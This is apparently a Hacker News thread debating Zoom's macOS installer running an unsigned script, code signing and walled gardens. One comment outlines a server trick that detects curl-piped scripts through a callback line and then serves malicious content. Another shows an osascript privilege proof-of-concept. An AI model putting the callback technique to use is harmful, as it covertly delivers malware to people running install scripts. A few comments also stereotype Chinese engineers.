Doing a fast google for these domains shows they are mostly known for being associated with malware...
Pretty bad solution if that was indeed the case.
"just to shut the error up" is about right.
I'm not intedning to demean non-native English speakers or their ability to write code - but this looks pretty bad from a QA standpoint.
edit: elsewhere in the thread its shown most of the software engineering team is in China, which explains this.
To see for yourself, simply `curl -I https://zoom.us`
†: I didn't misspell the name of the executable. It's missing an h.
A little ‘humour’ is allowed, right?
Ty for making me laugh.
It is also reported that their engineering team are not native English speakers but I don't think that's the main issue. I've seen codebases full of spelling errors where all developers were native speakers.
I've seen a lot of posts defending Zoom wrt other offences. But at this point it should be clear what their practices are.
Sometimes when coding I think there is technically an obscure race condition security flaw and, from time to time, leave a TODO instead of spending those grueling hours. This weirdly makes me sleep better at night.
At any rate, "sunlight is the best disinfectant"!
My point is that Zoom is replaceable and in fact, IMO should be replaced. Their tactics of using these dodgy techniques is because they want to have an edge over competition along the lines of "it just works".
I would contrast this to pure research services that add value that would otherwise not be there. Examples of this would be at the time that they were startups: Google (search algorithms) or Spotify (music categorisation algorithms). I'm not saying that today either of Google or Spotify are paragons of morality. At the hardware level I would include Tesla (battery tech) and Intel (processors).
My point is that the shady practises are at this point Zoom's product offering. If their video scaling algorithms are superior (and not just lifted from some open source libraries) then that should be their product offering. Not "it just works" via security exploits.
Later when I heard that Zoom installs and leaves a web server open on your machine, even if you uninstall it, I felt duped, since I did my due dilligence by Googling if it's malware. If it leaves a webserver running after uninstall, it's obviously malware, same as if it launched a Windows search for "passwords.txt". There's no real room for interpretation here.
But I didn't find that at the time.
Whereas if I did that Google search today I would find that it:
monitors activity on your computer -
is not encrypting end to end despite claims - https://news.ycombinator.com/item?id=22735746
allows any web site to access your camera at any time without requesting any kind of permission or making the user aware - https://news.ycombinator.com/item?id=20387298
reinstalls itself silently after uninstall (if you click a zoom link, after uninstall) -
If I were considering installing it today, I would install it only in a virtual machine after Googling what kind of protections to use when trying malware in a VM. (Since it can be expected to play shenanigans with your network and with the host's USB devices etc.) Just basic stuff, as Zoom isn't very sophisticated.
After I read all this I was angry. Not because all of this makes it obviously malware but because it's sloppy malware, and I specifically Googled whether it was sloppy, obvious malware and didn't get a clear "yes, Zoom is malware."
By the way sending data to Facebook doesn't make my list of links, as that is par for the course and anyone might do that. I have a pretty high tolerance for crap and to be honest Zoom is the only mainstream software that failed it so far.
Though I guess technically I still use Zoom every day (until I buy a new computer), you know, since I did install it that one time, before I uninstalled it...
Didn't stop them from becoming very successful.
They get away with it because they aren't liable for any damage caused by exploitation of vulnerabilities caused by their bad practices. If they had to indemnify the victims of their negligence, I guarantee they'd care a lot more about doing things right.
Code signing just says you can trust that the software you clicked on came from the actual developer.
It doesn't say anything at all about what the software does. Of course signed software can do whatever it wants. It's not like there's supposed to be some chain of trust that it's only allowed to run further signed code. It's free to run a Python script or shell command or whatever it wants. And installers certainly run scripts.
And as other comments here state, to do anything that requires root privileges, it pops up to ask for your admin password, so it's not getting around that.
I see references to this being a "malware pattern" but no explanation of why or what that means specifically. Zoom is commercial software (not malware) and I don't see how this is a vulnerability (something malware could take advantage of) so I'm not getting it.
Can someone explain what the problem is here? Or is there no problem?
If the binary runs an unsigned script, then that script could be modified to do something malicious.
Signing isn't difficult or expensive so why not insist on it?
You get the zoom signed package installing your unsigned code.
But the truth is you don't really need to do that. If people are coming to your own domain you can ship them whatever you want. I'd wager that well below 1/1,000,000 users actually verify signatures on binaries. For the huge majority of users, there is little you can do to prevent this.
did not try/verify though
The network can't do it if it is downloaded over TLS. A malicious host can already ship evil scripts. Malware on the local machine can already do worse that edit a script.
>Malware on the local machine can already do worse that edit a script.
Malware on the local machine may not have root rights. You're basically arguing that privilege escalation isnt a real threat.
What is the threat model?
To me, all this looks like people knowing that signing is somehow good and demanding it in a context where it isn't clear that it makes sense. And given that the top post in this thread is about skeevy domains, how the heck would signing scripts achieve anything? Even the reposted tweet says "don't think you could weaponize".
This is equivalent to not having signatures on your repository packages and saying "no biggie, we rely on transport encryption". Might work in most cases, but there's a reason good security uses layers. A failure at any point-- TLS downgrade attack, repo compromise, proxy compromise, DNS poisoning-- can result in your preflight script executing malicious code.
Requiring code signing with a pinned cert would solve this issue, but would be terribly out of character for the company that brought us a hidden local REST API to bypass OSX security prompts.
Same with the recent story on UNC links in Zoom chat. That's an issue in Windows. Why is windows sending your password out on the internet willy nilly? In this climate, 2020, Microsoft should know better.
Consider that any Mac app that:
* Supports plugins that aren't signed by Apple
* Executes scripts or macros from a file
would technically have the same "problem". That's a heck of a lot of apps.
On iOS Apple do insist on a full chain of security, which is why only Apple's own browser app can JIT code. It's an extremely perverse and serious limitation that has no real security justification: consider that Android manages just fine without it.
As far as I can tell, Zoom is currently the target of a witchhunt. People are digging for dirt and blowing stuff well out of proportion.
(Someday there will be a solid cross-platform native p2p video client with e2e encryption.)
> We designed iMessage and FaceTime to use end-to-end encryption, so there’s no way for Apple to decrypt the content of your conversations when they are in transit between devices.
the zoom witchhunt is really something. zoom may or may not be a witch (im no China apologist, i yell at all my friends for using tiktok), but if we get the answer right it will be based on luck and emotion, not logic and reason.
Zoom is an American company, headquartered in the US, employing mostly Americans, subject to US law, etc. Its CEO is an immigrant, but that's true of half the American tech companies out there, including Google and Microsoft.
EDIT: I'm white, but my wife is Asian-American and has told me more than once how white people often treat Asian-Americans as if they're not real Americans. I'd never witnessed that myself, but I guess the above comment is the kind of sentiment she's talking about. Zoom may or may not be a scummy company, but its founder's birthplace is immaterial. He's a US citizen, and deserves the same treatment we give to maybe-scummy white American CEOs like Mark Zuckerberg.
"“Our product development team is largely based in China, where personnel costs are less expensive than in many other jurisdictions,” Zoom wrote in a regulatory filing."
Zoom is a US company that is not answerable to the Chinese government. Like many companies, Zoom has chosen to outsource some of its operations, and those overseas offices create various infosec risks. And given that Zoom infosec seems to be a total clown show, those infosec risks are probably more serious at Zoom. But that would be equally true of any other American company that is really lax about security and too cheap to employ American developers.
Given that we have such horrible laws even in the "more democratic" parts of the world, such as Australia , it is not unthinkable that the Chinese government may ask a Chinese developer to install a backdoor to a foreign based product they are working on:
> The Electronic Frontier Foundation has said police could order individual IT developers to create technical functions without their company's knowledge.
If that was true, then events like the Huawei USA "Tappy"  incident wouldn't have occurred. In any case, I'm not trying to take a stance here but merely wanted to correct your statement that they had more engineers in the US than in China.
Huawei USA is almost certainly majority controlled by Huawei China, whereas Zoom's Chinese subsidiary is almost certainly majority controlled by the US parent company. Hence, Huawei is a Chinese company for practical purposes (the people calling the shots will go to jail if they don't do what the CCP wants) and Zoom is an American company (the people calling the shots go to jail if they break American law, and are mostly out of reach of the CCP).
Is there an unsigned app/package included with all Mac OS X installs?
> the number of Mac users running 100% signed code
You just have to ask yourself:
There might be exploit out there that exit the sandbox, but they are unintended. But here zoom is intentionaly widening an exploit by being reckless. So thanks to zoom we might now expect even more drastic sandboxing in next MacOS release.
> the number of Mac users running 100% signed code is well over 50%
Would you say he meant "number of users running exclusively sandboxed code"? Or do you claim he means "number of users running 100% signed code outside the sandbox"? The only claim that would even make sense is "more than 50% of Mac users run exclusively sandboxed code". And it can't mean "app sandbox", but any kind of sandbox? Like, do java programs qualify? Is the JVM malware? If you install a signed app that requires the JRE, do you also install something that could run unsigned code?
I'm beginning to think the same thing. Someone seems to be orchestrating a full out attack on Zoom. I'd say it's working.
However, it’s bafflingly weird to include such a thing just to skip a button press or two in the installer.
Not at all. Generally every mouse click required to get an app running will slash your userbase in size by some staggering amount, like 20-50%. I can't quite recall the exact number or where I've seen this, but I've definitely heard this fact from multiple sources, including at Google. Try counting how many clicks are required to get Chrome on your system and you'll be surprised how optimised it is.
Companies measure this, they're very sensitive to it of course. They want as many conversions as possible, but they can see that the more complex the install process gets, the fewer users make it through the other end. It's entirely normal for Zoom to want to simplify as much as possible.
All in all Apple does their best to provide the mechanisms but they are not necessary easy or trivial (w're dealing with the topic of security so what's to expect). Also with every step Apple takes to bind things down there is a public outcry that they are restricting peoples freedom in installing custom applications and pushing everyone into the Appstore ecosystem.
This of course doesn't excuse bad developer practices, but often it's the choice of doing things right or not being able to do them at all (never meeting your deadlines).
I had the pleasure of implementing one of the suggested privilege escallation systems in a pet project and it was a fun puzzle for me. But I can tell you it will be a PITA if you solve this problem under pressure as (even though Apple provides some tooling to verify everything ) it's really hard to figure out if all moving components are setup right for everything to work and to debug any issues.
 https://developer.apple.com/library/archive/samplecode/SMJob... https://github.com/brenwell/SMJobBless-Demo
- Send X bytes of the script
- Send the line `curl my.server.com/asdjkfh`
- Stop sending data, wait for a request to `/asdjkfh`
- If you receive said request, start sending malicious data
- If you don't, wait 5 seconds and continue sending a "fake" script
He knows theoretically that this could be spyware or worse, but hey, everybody else is using it. Seems like no big deal.
Same with that curl script. What are the chances it’s bad? Small. So you run it and hope for the best.
Edit to add: I mean, I hope they’ll lose a substantial number of paying customers over this? But I doubt it.
I don't get why people are so negative. I mean zoom is not unique in this sense, many of the everyday apps we use share at least some of these issues.
How many of us use Intel CPUs that had (still have) infinite number of vulnerabilities? Or MacOS that at some point allowed root to login without passwords? How many security issues we (software engineers) create on a daily bases simply because the management needs something for yesterday?
Yes, me too! I was going to edit my comment again to clarify, but I figured it wasn’t worthwhile trying to list all the caveats explicitly. But yes, if they fix this stuff and continue to be successful, that would be good.
How many security issues we (software engineers) create on a daily bases simply because the management needs something for yesterday?
I disagree with your premise there. Sure, security bugs can sneak in if you’re rushed, but that’s qualitatively different from actively exploiting security holes and using dark UI patterns to make your own life easier. I hope most engineers would refuse to implement feature requests like that. It should be considered a form of malpractice.
Very few. Zoom is written with a total disregard to security.
The reason is that we are living in an age of cognitive overload and time poverty. Time and cognitive space are far more expensive than the long tail risks associated with bad security and privacy.
I'm not sure about binaries in general - having secure boot as an anchor at least makes the exercise less futile - but there an interesting point brought up here:
Dynamic linker, dynamic libraries and dlopen.
I see solaris has elfsign - and it appears to be in OpenSolaris too:
Not sure if it would work on Linux - and you'd might want to prevent running unsigned binaries. Not sure if that's a thing on OpenSolaris. Still, being able to verify a binary might help with handling random downloads, I suppose.
> Modules built and shipped by Canonical with the official kernels are signed by the Canonical UEFI key and as such, are trusted. Custom-built modules will require the user to take the necessary steps to sign the modules before they loading them is allowed by the kernel.
but... installing zoom is already asking for my consent, through an OS prompt. Do you want to have to type your user password two times for every app you install or what ?
In fact I never understood why the HN crowd finds this policy so inoffensive. I've always considered it a massive intrusion on computing freedom.
I find it really shocking that "it is ok for a single entity to decide which software you can run on a device you own, with no accountability whatsoever", is now apparently a mainstream opinion on a tech forum. And more disturbingly, you make your case by arguing against the very notion of broadly-available general-purpose computing.
It comes down to how you perceive the technology. My MacBook Pro is a tool I use for work that needs to be highly flexible and configurable, so I’m willing to work to maintain it. My iPhone is a convenience. I will not put work into maintaining a convenience, that defeats the point.
Others view their phones differently, they may elect for more configuration at the expense of maintenance burden. That’s their choice to make. I for example view the idea of wanting to root ones phone to be absolutely insane.
I use Linux as my main OS even though I don't really customize it that much and never looked at the source code, because I think it's important that critical infrastructure (as operating systems are) should be open. I don't use Spotify, not because I think it's too expensive or inconvenient, but because I worry that the convenience of streaming can train us to not insist on our freedom to listen to music in DRM-free formats (I don't know if it exists already, but I kind of expect platform-exclusive music to be a thing soon). I use Firefox, not because I think it's better than Chromium but because I want to help avoid Google completely dominating the web, even at its endpoints, etc etc.
In the iPhone case, my worry is that if people get used to a smartphone not being a general purpose computing device, they can also be trained to view their laptop that way. I hope I don't need to argue why that would be a bad thing.
I dreamed about having a portable computer, somewhat like what my phone is now, when I was a kid. It ended up even cooler than I imagined it. The eventual device that came along has amazing battery life, oodles of CPU, RAM, and secondary storage, a wide array of sensors, multiple cameras with high resolution sensors and great optics, water resistance, exceptional build quality, a very small form factor, and it's at a price point that's reasonable. It's all great, except that I don't actually own it and can't use it for what I want.
Giving up control of the devices we own is dangerous. It most certainly is a slippery slope. The manufacturers will use "security" and "privacy" as a way to erect walled gardens on our heretofore general purpose computing devices. They will use the walled gardens to extract more revenue from developers and end users, and they'll act as police over what are "acceptable" applications. The average non-technical person doesn't understand why it's a problem, and those of us who are technical should be championing ownership instead of giving up control.
Chromebooks had a physical interlock that enabled/disabled the "trusted" functionality (perhaps they still do-- I haven't followed them). That is an acceptable solution, to me. It wouldn't be difficult to do, either. The fact that manufacturers don't include such functionality speaks volumes about their motivations.
It certainly looks like a slippery slope from where I'm standing. People have gotten used to not having full ownership of their phones, and tablets are kinda just big phones, so people have gotten used to not having full ownership of their tablets. But a tablet is also kind of like a small, highly portable laptop, and in fact many people use them as such. The boundary between the two is also blurring, with tablets becoming more laptop-like and laptops becoming more tablet-like.
I don't think it's a huge leap from here to fear that we are witnessing a trend, and that our ownership of our true general-purpose computing devices, such as our laptops, is not something we should take for granted.
Manufacturers could include physical interlocks to allow this "trusted" functionality. Early (all?) Chromebooks had this kind of functionality. Manufacturers aren't including it because it locks-in their revenue streams, and owners aren't demanding it because the average non-technical user (and, apparently, technical people too) don't understand the value of the ability to control the devices you own.
Fact is that the 3rd party apple ecosystem just moves more slowly, breaking less, but fixing less too.
Tradeoffs, not superiority, are the choices offered to consumers currently.
Interesting that we didn't know Zoom did this until everyone started using it, and someone finally audited it.
/usr/bin/osascript -e 'do shell script "touch /tmp/ran_successfully " with administrator privileges'
Are they the biggest?
Besides that, this certainly isn't the first time Zoom's shady practices have been exposed, where many other conferencing products haven't had such a track record.
Zoom has been repeatedly breaking the trust of their users - it's a clear pattern that won't change.
Moreso than others? I deal with customers/partners all the time, and I count the following desktop clients installed on my laptop:
- Skype for Business
- Hangout Meet
And I'm probably missing a bunch. Is Zoom that much bigger?
Now it is the market leader. Hence all the bad P.R.
Zoom's CEO was the head engineer for WebEx.
Also public, profitable.
e.g., if a majority (or even strong minority) of people in a country bends a rule, you change the rule to accommodate people, you don't put 30% of your population in jail.
If zoom was a country, it would be the ~10th european country by population, you can't just ignore that.
Again, I'm playing devils advocate for a pro-walled-garden opinion me myself don't believe in, so don't take my opinion too seriously.
Pure cynicism on my part by default, so it's all good, mate.
App Store, Gatekeeper, etc are now working against what they were supposed to solve and encouraging worse developer behavior.
Really the best solution would be tackling the reasons why Zoom are doing this in the first place. Like how they provided a gentler version of Sandboxing to work around pro creative apps being basically unusable in the first versions.
The more you lock it down the more bad behavior you'll encourage from less ethical developers.
Are you talking about something else or am I misunderstanding here?
Yes it is.
Just based on the title, consider that web browsers are signed binaries that run any unsigned script :)
"China-born entrepreneur hit a snag. The U.S. government denied his visa application -- eight times.
After two years of rejection, Yuan, 49, finally made it to the U.S. and is now the major shareholder of video conference services firm Zoom Video Communications Inc."
I do not know what their visa denial rate was but I am happy they persisted :)
but most of the conversation is missing:
"This comment is currently under review for potential violation of the GitLab Code of Conduct.
For more information, please reach out to firstname.lastname@example.org."
so we'll never know what's the end story there. If someone knows I'm curious.
Though personally, I don't think China is more a danger than the US, or any local spying organisation of your choice.
It's opensource, free and doesn't require user accounts. Plus you can host it yourself.
This is yet another indication that nobody at Zoom has a single clue on how to build a secure and stable application. Another example of that mindset released today: https://www.theverge.com/2020/3/31/21201956/zoom-leak-user-i... They are proving to completely not understand how to design security/privacy features. Frankly, their technology team sounds like total amateurs that hack things together.
Public, profitable, founder was Head Engineer for Cisco WebEx. Runs global videoconferencing under massive new load during Covid-19, on their own servers.
HN comment: "total amateurs".
Love this place.
You're free to analyse it and publish your findings. That's not making zoom any better.